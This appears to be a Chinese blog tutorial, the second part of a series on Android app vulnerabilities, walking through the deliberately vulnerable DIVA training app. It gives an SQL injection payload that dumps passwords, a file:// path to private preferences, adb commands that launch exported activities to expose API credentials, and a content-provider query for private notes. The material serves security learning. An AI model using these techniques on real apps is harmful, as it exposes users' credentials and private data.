接上一篇沒寫完的文章《Android App漏洞學習(一)》,下麵繼續剩下的幾個部分。
PART 7不安全的輸入1(sqli)
打開日誌:
adb logcat
輸入一個單引號,在日誌中可以看到報錯資訊,存在sql注入。
輸入' or '1'='1,可返回所有使用者密碼。
PART 8不安全的輸入2(讀取本地檔案)
可訪問本地的任意檔案,輸入
file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml
PART 9 存取控制1(Activity 1)
查看AndroidManifest.xml檔案中暴露的activity組件:
利用am(Activity Manager tool)啟動暴露的組件,來繞過許可權控制:
adb shell am start jakhar.aseem.diva/.APICredsActivity
adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS
同時也可以使用drozer來完成:
PART 10 存取控制2(Activity 2)
輸入adb shell am start jakhar.aseem.diva/.APICreds2Activity,並沒有出現PART9中的情况,添加了驗證PIN碼。
PART 11 存取控制3(Content Providers)
查找暴露的Content Providers組件:
然後查找包含content://的smali檔案。
$ grep -lr“content://”*
查看私有日誌內容
$ adb shell content query–uri content://jakhar.aseem.diva.provider.notesprovider/notes
另一種管道:使用drozer:
總結
本文將上次未講完的內容大概提了一下,大家在學習測試的時候有任何問題都可以提出來,大家一起交流,為了更好的交流請大家加入學習群,向作者大膽提問,共同成長。